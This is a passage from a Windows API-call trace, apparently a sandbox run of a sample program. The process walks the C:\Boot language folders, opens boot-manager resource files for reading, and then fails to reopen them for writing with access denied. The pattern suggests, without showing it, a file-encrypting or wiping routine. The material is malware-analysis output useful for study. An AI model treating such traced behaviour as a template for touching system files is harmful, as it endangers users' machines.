lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.044] GetLastError () returned 0x5 [0069.044] GetLastError () returned 0x5 [0069.044] SetLastError (dwErrCode=0x5) [0069.044] GetLastError () returned 0x5 [0069.044] SetLastError (dwErrCode=0x5) [0069.044] GetLastError () returned 0x5 [0069.044] SetLastError (dwErrCode=0x5) [0069.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.044] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.044] FindFirstFileExW (in: lpFileName="C:\\Boot\\cs-CZ\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78110 [0069.044] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.044] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0069.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.045] AreFileApisANSI () returned 1 [0069.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0069.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.046] AreFileApisANSI () returned 1 [0069.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0069.327] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.328] GetFileType (hFile=0x41c) returned 0x1 [0069.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.328] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.328] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.328] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.328] CloseHandle (hObject=0x41c) returned 1 [0069.329] AreFileApisANSI () returned 1 [0069.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0069.329] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.329] GetLastError () returned 0x5 [0069.329] GetLastError () returned 0x5 [0069.329] SetLastError (dwErrCode=0x5) [0069.329] GetLastError () returned 0x5 [0069.329] SetLastError (dwErrCode=0x5) [0069.329] GetLastError () returned 0x5 [0069.329] SetLastError (dwErrCode=0x5) [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.329] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.330] AreFileApisANSI () returned 1 [0069.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\cs-CZ\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\cs-CZ\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.330] AreFileApisANSI () returned 1 [0069.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 30 [0069.331] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.331] GetFileType (hFile=0x41c) returned 0x1 [0069.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.331] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.331] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.331] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.331] CloseHandle (hObject=0x41c) returned 1 [0069.332] AreFileApisANSI () returned 1 [0069.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0069.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 30 [0069.332] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.332] GetLastError () returned 0x5 [0069.332] GetLastError () returned 0x5 [0069.332] SetLastError (dwErrCode=0x5) [0069.332] GetLastError () returned 0x5 [0069.332] SetLastError (dwErrCode=0x5) [0069.332] GetLastError () returned 0x5 [0069.332] SetLastError (dwErrCode=0x5) [0069.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.332] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x693f8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0069.332] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0069.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.333] AreFileApisANSI () returned 1 [0069.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\da-DK", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\da-DK", lpUsedDefaultChar=0x0) returned 14 [0069.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0069.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.333] AreFileApisANSI () returned 1 [0069.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\da-DK") returned 14 [0069.334] CreateFileW (lpFileName="C:\\Boot\\da-DK" (normalized: "c:\\boot\\da-dk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.334] GetLastError () 